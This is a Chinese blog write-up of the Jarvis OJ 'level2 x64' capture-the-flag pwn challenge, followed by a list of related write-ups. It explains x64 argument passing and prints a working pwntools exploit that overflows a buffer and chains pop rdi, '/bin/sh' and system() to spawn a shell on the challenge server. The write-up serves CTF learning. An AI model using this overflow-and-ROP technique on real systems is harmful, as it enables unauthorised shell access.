Jarvis oj level2 (x64) wp

最新推荐文章于 2025-05-27 16:11:27 发布
最新推荐文章于 2025-05-27 16:11:27 发布
阅读量334 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn Jarvis OJ pwn题目 wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43394612/article/details/85850326
本文深入解析了64位程序如何通过寄存器和堆栈传递参数,详细介绍了前6个参数使用RDI, RSI, RDX, RCX, R8, R9寄存器传递的规则,以及超过6个参数时如何逆序压入堆栈。并通过一个pwn题目实例,展示了如何利用IDA分析程序,找到pop rdi ret地址,构造payload,最终实现远程执行/bin/sh。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

64位程序前6个参数通过寄存器来传递,多于6个的使用堆栈传递。前6个从左到右依次为RDI,RSI,RDX,RCX,R8,R9。多于六个的从右往左依次压入堆栈

拿到题目检查保护:
在这里插入图片描述
放ida里,还是之前一样的程序:
在这里插入图片描述
程序本身有字符串/bin/sh
在这里插入图片描述
找下pop rdi ret 在哪:
在这里插入图片描述
编写exp:

from pwn import*
  
a=remote("pwn2.jarvisoj.com","9882")

elf=ELF("level2_x64")

system_addr=elf.symbols["system"]

a.recvuntil("\n")

pop_rdi_ret=0x00000000004006b3

bin_sh=0x0000000000600A90

payload='A'*136

payload += p64(pop_rdi_ret) + p64(bin_sh) + p64(system_addr)

a.sendline(payload)

a.interactive()
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1496
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
jarvisoj pwn level5 wp
zszcr的博客
03-26 2033
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis oj level2 wp
ditto的博客
12-30 1259
检查防护 开启了NX,没开启PIE和canary防护,程序本身的基址不变。 放IDA里看一下 程序本身调用了system函数,那么PLT表里就一定有这个函数。 看下vulner函数 很显然栈溢出。 IDA查找下字符串: 发现了/bin/sh字符串,而且在本身程序的data段,由于没有开启PIE,那么这个字符串的首地址是不会变的。 简单计算下,首地址是0x0804A024, 算下溢出点是多...
BUUCTF jarvisoj_level2_x64超详细
最新发布
2402_88130150的博客
05-27 282
尝试凭借ROPgadget --binary level2_x64 --string '/bin/sh'发现存在0x0000000000600a90 : /bin/sh。现在有了:systemadd=0x4004c0 commendadd=0x600a90 rdiadd=0x4006b3.发现注入点read()(读取0x200个字符),有变量buf[128]的128个字符+s的额外8个字符。在左边的函数列表中,发现system(char commend)函数,有一个参数。思路:调用函数,传入参数
jarvisoj_level2_x64
zip471642048的博客
06-24 651
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 441
Buu CTF PWN题jarvisoj_level0的WriteUp
jarvisoj pwn level4时LibcSearcher和DynELF搜到的libc版本不同
weixin_43350880的博客
08-07 878
jarvisoj pwn的level4乍一看是一道常规的ROP,可以ret2libc 但是遇到一个问题 自己写的脚本本地能跑通,远程跑不通 可以看到本地是能拿到shell的 在网上搜了其他人的wp,全都是用DynELF做的,对比发现是LibcSearcher和DynELF搜到的libc版本不同导致远程跑不通。 远程用DynELF找到的libc版本 远程LibcSearcher的结果 本地Dyn...
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 515
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1570
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
JarvisOJ level2x64
PLpa的博客
07-09 648
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的六个参...
Jarvis OJ [XMAN]level2
九层台
07-06 368
查询保护 liu@liu-F117-F:~/桌面/oj/level2$ checksec level2 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2/level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1132
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
jarvisoj-level2
qq_35661990的博客
11-09 1438
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
jarvisoj_level2
m0sway的博客
03-20 969
jarvisoj_level2 WriteUP BUU_PWN
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1557
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值